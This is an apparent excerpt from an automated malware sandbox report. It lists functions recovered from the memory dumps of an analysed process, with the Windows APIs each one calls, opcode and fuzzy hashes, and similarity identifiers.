                                                                                            • Instruction Fuzzy Hash: 69617C34A11609DFEB14EFB4D458AEEBBB2AF84344F118829D516AB3A4DF349845CF90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0147A518, Relevance: 2.0, APIs: 1, Instructions: 515libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LdrInitializeThunk.NTDLL(?,?,?,?,?,?,?,00000000,?), ref: 0147AA7F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.555845708.0000000001470000.00000040.00000001.sdmp, Offset: 01470000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 9f7d527145acdadc6b2253a2ddd8aad9a9c60d843ef6da72614650b9116cd684
                                                                                            • Instruction ID: 319060c2668ad89e4c10db0bfa24c26344c514cc398236da66e3cfd46d4fdf8e
                                                                                            • Opcode Fuzzy Hash: 9f7d527145acdadc6b2253a2ddd8aad9a9c60d843ef6da72614650b9116cd684
                                                                                            • Instruction Fuzzy Hash: 6E12C030A002058FCB14DFB4D854AAEBBB2EF89304F29896AD5159F3A5DB74DC46CB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0150F77A, Relevance: 1.7, APIs: 1, Instructions: 223COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetWindowLongPtrA.USER32(00000001,00000000,00000000,00000000,00000000,00000000), ref: 0150F8F6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.555999443.0000000001500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LongWindow
                                                                                            • String ID:
                                                                                            • API String ID: 1378638983-0
                                                                                            • Opcode ID: 58efd904c2f19fd19f4c2d695cfc8324cce22600ee0a405a9126527cb12da803
                                                                                            • Instruction ID: 22f7bb08f531f2b4880b3a4107f43cb5af24954a030637c6527d6ad5ee65686a
                                                                                            • Opcode Fuzzy Hash: 58efd904c2f19fd19f4c2d695cfc8324cce22600ee0a405a9126527cb12da803
                                                                                            • Instruction Fuzzy Hash: 93817E30B002059BD724DBB8C858B6E77E6BFC9304F19C829D4069F395DFB59C858741
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0147E488, Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.555845708.0000000001470000.00000040.00000001.sdmp, Offset: 01470000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 384bdca4fe1a86d80b16fdcee9daddb956c94823e5782b476708af308edb91ac
                                                                                            • Instruction ID: 59a30796076b86b40c07f1f90dcb631fa7c0fba59109cffebf842990fb1c161d
                                                                                            • Opcode Fuzzy Hash: 384bdca4fe1a86d80b16fdcee9daddb956c94823e5782b476708af308edb91ac
                                                                                            • Instruction Fuzzy Hash: 9C41E472D1035A8FCB14CFA9D4442EEBBF5AF89220F1486ABD504A7350EB749845CBE1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01478F47, Relevance: 1.6, APIs: 1, Instructions: 120registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegOpenKeyExW.KERNELBASE(80000001,00000000,?,00000001,?), ref: 0147905C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.555845708.0000000001470000.00000040.00000001.sdmp, Offset: 01470000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: Open
                                                                                            • String ID:
                                                                                            • API String ID: 71445658-0
                                                                                            • Opcode ID: 11b801878786384ff3940bfdd81f1f31be1ae51035d363ce8f64d173be9034c6
                                                                                            • Instruction ID: 06f7cd4f1311cbe409141656211619da5536d0628568c9feb2ef22d7760aab9b
                                                                                            • Opcode Fuzzy Hash: 11b801878786384ff3940bfdd81f1f31be1ae51035d363ce8f64d173be9034c6
                                                                                            • Instruction Fuzzy Hash: 264146B0E013499FDB10CFA9C548ADEBBF5FF49318F24816AE408AB351C7799845CB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01479205, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 014792C9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.555845708.0000000001470000.00000040.00000001.sdmp, Offset: 01470000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: QueryValue
                                                                                            • String ID:
                                                                                            • API String ID: 3660427363-0
                                                                                            • Opcode ID: 8ca77d48beb54adbac0b981afe080c86f7274a5af14c9183eb010d96cff15450
                                                                                            • Instruction ID: d4cb2c880153f30344ff7db6fe020cdd756880a19a8436acd4796b78aed8e495
                                                                                            • Opcode Fuzzy Hash: 8ca77d48beb54adbac0b981afe080c86f7274a5af14c9183eb010d96cff15450
                                                                                            • Instruction Fuzzy Hash: 8031DDB1D012589FCB14CFAAC984ADEBFF5BF48324F14842AE819AB350D7749945CFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01470190, Relevance: 1.6, APIs: 1, Instructions: 88registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 014792C9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.555845708.0000000001470000.00000040.00000001.sdmp, Offset: 01470000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: QueryValue
                                                                                            • String ID:
                                                                                            • API String ID: 3660427363-0
                                                                                            • Opcode ID: 496115c4a6ddcc43d525159ba64a19194e8362b588574c96ded5cc3c7027e1a3
                                                                                            • Instruction ID: b132b7d26fc41df87912863902ebae3e27b4638a8be9f8682a51365652bf84de
                                                                                            • Opcode Fuzzy Hash: 496115c4a6ddcc43d525159ba64a19194e8362b588574c96ded5cc3c7027e1a3
                                                                                            • Instruction Fuzzy Hash: 5831EEB1D002589FCB20CF9AC984ADEBFF5BF48324F14842AE819AB350D7749945CFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01476A5F, Relevance: 1.6, APIs: 1, Instructions: 86libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.555845708.0000000001470000.00000040.00000001.sdmp, Offset: 01470000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 9b51faaa05bcd9e3cbfb5929e03706e06e2654351ed8988f10e0e9aae879fe29
                                                                                            • Instruction ID: 0a2e4c4ba0e48e4a3023de2d10d7e7a92a66ef5e5eeba3f041e4683f45e9e21e
                                                                                            • Opcode Fuzzy Hash: 9b51faaa05bcd9e3cbfb5929e03706e06e2654351ed8988f10e0e9aae879fe29
                                                                                            • Instruction Fuzzy Hash: E331C330A053489FE714DF75C458AD97BB2FF45304F15846EE105AB3A2C739984ACF51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01470184, Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegOpenKeyExW.KERNELBASE(80000001,00000000,?,00000001,?), ref: 0147905C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.555845708.0000000001470000.00000040.00000001.sdmp, Offset: 01470000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: Open
                                                                                            • String ID:
                                                                                            • API String ID: 71445658-0
                                                                                            • Opcode ID: 570378d398264fdfa651fb5aafcda49b8206ba790b5cd6cb8d2c782cab45b148
                                                                                            • Instruction ID: 3efa4ed98580ae80e694c409cb215c97192ff0972016f3837444de4d30a83c73
                                                                                            • Opcode Fuzzy Hash: 570378d398264fdfa651fb5aafcda49b8206ba790b5cd6cb8d2c782cab45b148
                                                                                            • Instruction Fuzzy Hash: 3E3102B0D11288DFDB10CF99C584ACEFBF5BF48318F24856AE809AB351C7759885CB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01276DA4, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,00000000,?,01277D89,00000800), ref: 01277E1A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.554865016.0000000001270000.00000040.00000001.sdmp, Offset: 01270000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad
                                                                                            • String ID:
                                                                                            • API String ID: 1029625771-0
                                                                                            • Opcode ID: 7132c9b4fe417ae81f90c1e23f47641960bd4a7f1fea429886cdf9f1fa4fb28f
                                                                                            • Instruction ID: 2910f3d018e3c857aa286ff8410d1c67f12ad6248acb24c8ed66034fcad3d08b
                                                                                            • Opcode Fuzzy Hash: 7132c9b4fe417ae81f90c1e23f47641960bd4a7f1fea429886cdf9f1fa4fb28f
                                                                                            • Instruction Fuzzy Hash: 5B11E4B69102499FDB10CF9AC488BDFFBF4EB48324F14882AD925A7610C374A945CFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01277DA9, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,00000000,?,01277D89,00000800), ref: 01277E1A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.554865016.0000000001270000.00000040.00000001.sdmp, Offset: 01270000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad
                                                                                            • String ID:
                                                                                            • API String ID: 1029625771-0
                                                                                            • Opcode ID: df77311d6c3642aba416cc87dad3f1d36fbae74afbb8c45e77e5d1c93d086197
                                                                                            • Instruction ID: f05d34e1dad548c96a7e1641d3e2e44f20f66a73fa94e3f136144c2329d0a2be
                                                                                            • Opcode Fuzzy Hash: df77311d6c3642aba416cc87dad3f1d36fbae74afbb8c45e77e5d1c93d086197
                                                                                            • Instruction Fuzzy Hash: E82117B6D002499FDB10CF9AC448ADEFBF4AB88324F14852ED529A7600C379A945CFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0147CF18, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0147E4DA), ref: 0147E5C7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.555845708.0000000001470000.00000040.00000001.sdmp, Offset: 01470000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: GlobalMemoryStatus
                                                                                            • String ID:
                                                                                            • API String ID: 1890195054-0
                                                                                            • Opcode ID: 85c81c8afea0a23ac61be98721bfc703cf2e71c145e5902c3a04aa66f57e4778
                                                                                            • Instruction ID: ff31fe8946524f9cae8b7fdc7f5a3b48368ea8f3a9bc92868d31b2806465ea0e
                                                                                            • Opcode Fuzzy Hash: 85c81c8afea0a23ac61be98721bfc703cf2e71c145e5902c3a04aa66f57e4778
                                                                                            • Instruction Fuzzy Hash: 701133B1C006199BCB10CF9AC444BDEFBF4AB08224F14866AE818B7240E378A954CFE1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0127B6E8, Relevance: 1.5, APIs: 1, Instructions: 47comCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • OleInitialize.OLE32(00000000), ref: 0127B745
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.554865016.0000000001270000.00000040.00000001.sdmp, Offset: 01270000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: Initialize
                                                                                            • String ID:
                                                                                            • API String ID: 2538663250-0
                                                                                            • Opcode ID: 68b334fcdc174e73d1cab21eeb8d8755c7478b791fe1105fcd57187fdd16cad8
                                                                                            • Instruction ID: bd8ea72cbe6f81d9476d4899d8567f9f2122a22845c5d76ae81f05121dc9152f
                                                                                            • Opcode Fuzzy Hash: 68b334fcdc174e73d1cab21eeb8d8755c7478b791fe1105fcd57187fdd16cad8
                                                                                            • Instruction Fuzzy Hash: D61115B5900249CFDB20CF9AD488BDEFBF8EB48324F148819D519A7700D378A944CFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0127A7B0, Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • OleInitialize.OLE32(00000000), ref: 0127B745
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.554865016.0000000001270000.00000040.00000001.sdmp, Offset: 01270000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: Initialize
                                                                                            • String ID:
                                                                                            • API String ID: 2538663250-0
                                                                                            • Opcode ID: 512d461c91af1002f4ad188b0cc422b235e6e1acdf751203703a5ec54c1b6fdf
                                                                                            • Instruction ID: 024155ce954ff725bd2f1d0ae095e48ee11b36df2a6f311c7f20a9e2a50757d1
                                                                                            • Opcode Fuzzy Hash: 512d461c91af1002f4ad188b0cc422b235e6e1acdf751203703a5ec54c1b6fdf
                                                                                            • Instruction Fuzzy Hash: 571115B5910649CFCB10DF9AC488BDEFBF8EB48324F148859D519A7700D378A944CFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0153D450, Relevance: .1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.556305580.000000000153D000.00000040.00000001.sdmp, Offset: 0153D000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 432f97bf50a425f61af15a2ceef19d276c5931fc9645559907b7cdbdd7822115
                                                                                            • Instruction ID: 43dd8f76679fd46c5cc93652081fea6e5fe9873e5423fd14bee5f4c4cc759622
                                                                                            • Opcode Fuzzy Hash: 432f97bf50a425f61af15a2ceef19d276c5931fc9645559907b7cdbdd7822115
                                                                                            • Instruction Fuzzy Hash: 8421FF71504240EFDB11DF94D9C0B6ABBB5FBC8328F64C969E8050F256C376E856CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0153D53C, Relevance: .1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.556305580.000000000153D000.00000040.00000001.sdmp, Offset: 0153D000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1dad87ade2e7a900b112103498c396e3ab2614818d4e530e6a87c60deae1e6ed
                                                                                            • Instruction ID: 1301250481b5ffda133425bf87e7e115b1061018261a9aa55643ab0f872bcd65
                                                                                            • Opcode Fuzzy Hash: 1dad87ade2e7a900b112103498c396e3ab2614818d4e530e6a87c60deae1e6ed
                                                                                            • Instruction Fuzzy Hash: 8221F171504244EFDB01DF94D9C0B6ABBB5FBC4328F248969E8094F286C336D456CAA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0154D01C, Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.556508011.000000000154D000.00000040.00000001.sdmp, Offset: 0154D000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5846602af4c56ca9e46be855f5562dd4b598e947aa405e84fe59a23dd6a32271
                                                                                            • Instruction ID: 333c3abdcd0d030651ebdadbdf1e6ddd28bfaaf6232a90e7dd8468fb37adf1cb
                                                                                            • Opcode Fuzzy Hash: 5846602af4c56ca9e46be855f5562dd4b598e947aa405e84fe59a23dd6a32271
                                                                                            • Instruction Fuzzy Hash: 3821FF71504200DFCB15CFA4D9C4B2ABBB5FB94358F20C9A9D80D0F246D33AD846CA61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0154D006, Relevance: .1, Instructions: 62COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.556508011.000000000154D000.00000040.00000001.sdmp, Offset: 0154D000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7e5659402787b248daa5fc8f11c96bd0ff2b4b1c6a6be0236bf85f461b4670eb
                                                                                            • Instruction ID: c1d43a85fd682d858f356c5c62eeff433c804705ae27674be9ac33dc295ab5bf
                                                                                            • Opcode Fuzzy Hash: 7e5659402787b248daa5fc8f11c96bd0ff2b4b1c6a6be0236bf85f461b4670eb
                                                                                            • Instruction Fuzzy Hash: 69218E755093808FCB12CF64D994B15BF71FB46214F28C5EAD8498F6A7C33AD80ACB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0153D44B, Relevance: .1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.556305580.000000000153D000.00000040.00000001.sdmp, Offset: 0153D000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3e6c89239df67498be77b060bf65be1ef1e38a19ab4644c7e8481d50feaf49eb
                                                                                            • Instruction ID: 05fc2371f09da669b6641141ee0db671ab3d5c8f1796dd6cba4ab29326d60371
                                                                                            • Opcode Fuzzy Hash: 3e6c89239df67498be77b060bf65be1ef1e38a19ab4644c7e8481d50feaf49eb
                                                                                            • Instruction Fuzzy Hash: 3C11BE76404280CFDB12CF54D9C4B1ABF71FB88324F2886A9D8050F657C33AD55ACBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0153D537, Relevance: .1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.556305580.000000000153D000.00000040.00000001.sdmp, Offset: 0153D000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3e6c89239df67498be77b060bf65be1ef1e38a19ab4644c7e8481d50feaf49eb
                                                                                            • Instruction ID: 22d852750ee77ebb390846b32639e0894ca349a260925c156e9d51a7f233709a
                                                                                            • Opcode Fuzzy Hash: 3e6c89239df67498be77b060bf65be1ef1e38a19ab4644c7e8481d50feaf49eb
                                                                                            • Instruction Fuzzy Hash: 8711BE76404280CFCB12CF54D9C4B5ABF72FB84324F2886A9D8094F656C33AD55ACBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions